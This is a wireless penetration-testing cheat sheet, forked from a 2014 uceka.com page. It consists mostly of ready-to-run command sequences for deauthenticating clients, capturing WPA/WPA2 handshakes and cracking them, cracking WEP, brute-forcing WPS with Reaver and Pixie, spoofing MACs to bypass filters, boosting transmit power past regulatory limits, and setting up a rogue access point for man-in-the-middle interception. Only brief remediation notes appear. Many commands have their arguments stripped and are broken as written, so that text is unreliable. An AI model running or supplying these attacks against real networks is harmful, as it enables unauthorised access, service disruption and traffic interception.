Cette page est un fork de https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ **WPA2 PSK attack with aircrack-ng suite.** --------------------------------------- ifconfig wlan1 # check wireless IFace sudo airmon-ng check kill # kill issue causing processes sudo airmon-ng start wlan1 # start monitor mode sudo airodump-ng wlan1mon # start capturing sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client sudo aircrack-ng output-01.cap dict # crack the passphrase **WPA PSK attack with aircrack-ng suite.** -------------------------------------- Place your wireless card into Monitor Mode airmon-ng start wlan0 Detect all available wireless AP’s and clients airodump-ng mon0 Setting adapter channel iwconfig mon0 channel Capturing the four-way handshake airodump-ng --channel --bssid --write capture mon0 You can capture the handshake passively (it takes time) or de-authenticate a client. De-authentication attack aireplay-ng --deauth 3 -a -c mon0 Deauth every client - aireplay-ng -0 5 -a mon0 Dictionary Attack aircrack-ng -w passwords.lst capture-01.cap Brute force Attack crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap **WEP attack with aircrack-ng suite.** ---------------------------------- Place your wireless card into Monitor Mode airmon-ng start wlan0 Detect all available wireless AP’s and clients airodump-ng mon0 Setting adapter channel iwconfig mon0 channel airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) aircrack-ng -b (bssid) (file name-01.cap) **Rogue Access Point Testing** -------------------------- # ifconfig wlan0 down # iw reg set BO # iwconfig wlan0 txpower 0 # ifconfig wlan0 up # airmon-ng start wlan0 # airodump-ng --write capture mon0 root@backbox:/home/backbox# ifconfig wlan1 down root@backbox:/home/backbox# iw reg set BO root@backbox:/home/backbox# ifconfig wlan1 up root@backbox:/home/backbox# iwconfig wlan1 channel 13 root@backbox:/home/backbox# iwconfig wlan1 txpower 30 root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto **Reaver** ------ airmon-ng start wlan0 airodump-ng wlan0 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1 **Pixie WPS** --------- airmon-ng check airmon-ng start wlan0 airodump-ng wlan0mon --wps reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1 **Wireless Notes** -------------- Wired Equivalent Privacy (WEP) RC4 stream cipher w/ CRC32 for integrity check - Attack: By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. - Remediation: Use WPA2 Wifi Protected Access (WPA) Temporal Key Integrity Protocol (TKIP) Message Integrity Check - Attack: Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation: Use long-keys Wifi Protected Access 2 (WPA2) Advanced Encryption Standard (AES) - Attack: Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation: WPA-Enterprise ---------------------------------------------------------- all credits to @uceka.com for the following section (found below) original work found here https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ ---------------------------------------------------------- **WIRELESS ANTENNA** ---------------- Open the Monitor Mode root@uceka:~# ifconfig wlan0mon down root@uceka:~# iwconfig wlan0mon mode monitor root@uceka:~# ifconfig wlan0mon up Increase Wi-Fi TX Power root@uceka:~# iw reg set B0 root@uceka:~# iwconfig wlan0 txpower #txpower is 30 (generally) #txpower is depends your country, please googling root@uceka:~# iwconfig Change WiFi Channel root@uceka:~# iwconfig wlan0 channel **WEP CRACKING** ------------ Method 1 : Fake Authentication Attack root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -1 0 -a -h -e wlan0mon root@uceka:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b -h wlan0mon root@uceka:~# aircrack-ng -b Method 2 : ARP Replay Attack root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -3 -x 1000 -n 1000 -b -h wlan0mon root@uceka:~# aircrack-ng -b Method 3 : Chop Chop Attack root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -1 0 -e -a -h wlan0mon root@uceka:~# aireplay-ng -4 -b -h wlan0mon #Press ‘y’ ; root@uceka:~# packetforge-ng -0 -a -h -k -l -y -w root@uceka:~# aireplay-ng -2 -r wlan0mon root@uceka:~# aircrack-ng Method 4 : Fragmentation Attack root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon #What’s my mac? root@uceka:~# macchanger --show wlan0mon root@uceka:~# aireplay-ng -1 0 -e -a -h wlan0mon root@uceka:~# aireplay-ng -5 -b -h < OurMac > wlan0mon #Press 'y' ; root@uceka:~# packetforge-ng -0 -a -h < OurMac > -k -l -y -w root@uceka:~# aireplay-ng -2 -r wlan0mon root@uceka:~# aircrack-ng Method 5 : SKA (Shared Key Authentication) Type Cracking root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon root@uceka:~# aireplay-ng -0 10 -a -c wlan0mon root@uceka:~# ifconfig wlan0mon down root@uceka:~# macchanger --mac wlan0mon root@uceka:~# ifconfig wlan0mon up root@uceka:~# aireplay-ng -3 -b -h wlan0mon root@uceka:~# aireplay-ng --deauth 1 -a -h wlan0mon root@uceka:~# aircrack-ng **WPA / WPA2 CRACKING** ------------------- Method 1 : WPS Attack root@uceka:~# airmon-ng start wlan0 root@uceka:~# apt-get install reaver root@uceka:~# wash -i wlan0mon -C root@uceka:~# reaver -i wlan0mon -b -vv -S #or, Specific attack root@uceka:~# reaver -i -c -b -p -vv -S Method 2 : Dictionary Attack root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon root@uceka:~# aireplay-ng -0 1 -a -c wlan0mon root@uceka:~# aircrack-ng -w -b Method 3 : Crack with John The Ripper root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon root@uceka:~# aireplay-ng -0 1 -a -c wlan0mon root@uceka:~# cd /pentest/passwords/john root@uceka:~# john -wordlist= --rules -stdout|aircrack-ng -0 -e -w - Method 4 : Crack with coWPAtty root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon root@uceka:~# aireplay-ng -0 1 -a -c wlan0mon root@uceka:~# cowpatty -r -f -2 -s root@uceka:~# genpmk -s -f -d root@uceka:~# cowpatty -r -d -2 -s Method 5 : Crack with Pyrit root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon root@uceka:~# aireplay-ng -0 1 -a -c wlan0mon root@uceka:~# pyrit -r -b -i attack_passthrough root@uceka:~# pyrit -i import_passwords root@uceka:~# pyrit -e create_essid root@uceka:~# pyrit batch root@uceka:~# pyrit -r attack_db Method 6 : Precomputed WPA Keys Database Attack root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon root@uceka:~# aireplay-ng -0 1 -a -c wlan0mon root@uceka:~# kwrite ESSID.txt root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt root@uceka:~# airolib-ng NEW_DB --import passwd root@uceka:~# airolib-ng NEW_DB --clean all root@uceka:~# airolib-ng NEW_DB --stats root@uceka:~# airolib-ng NEW_DB --batch root@uceka:~# airolib-ng NEW_DB --verify all root@uceka:~# aircrack-ng -r NEW_DB **FIND HIDDEN SSID** ---------------- root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid wlan0mon root@uceka:~# aireplay-ng -0 20 -a -c wlan0mon ##BYPASS MAC FILTERING root@uceka:~# airmon-ng start wlan0 root@uceka:~# airodump-ng -c --bssid -w wlan0mon root@uceka:~# aireplay-ng -0 10 --a -c wlan0mon root@uceka:~# ifconfig wlan0mon down root@uceka:~# macchanger --mac wlan0mon root@uceka:~# ifconfig wlan0mon up root@uceka:~# aireplay-ng -3 -b -h wlan0mon **MAN IN THE MIDDLE ATTACK** ------------------------ root@uceka:~# airmon-ng start wlan0 root@uceka:~# airbase-ng -e “” wlan0mon root@uceka:~# brctl addbr root@uceka:~# brctl addif wlan0mon root@uceka:~# brctl addif at0 root@uceka:~# ifconfig eth0 0.0.0.0 up root@uceka:~# ifconfig at0 0.0.0.0 up root@uceka:~# ifconfig up root@uceka:~# aireplay-ng -deauth 0 -a wlan0mon root@uceka:~# dhclient3 & root@uceka:~# wireshark & ;select interface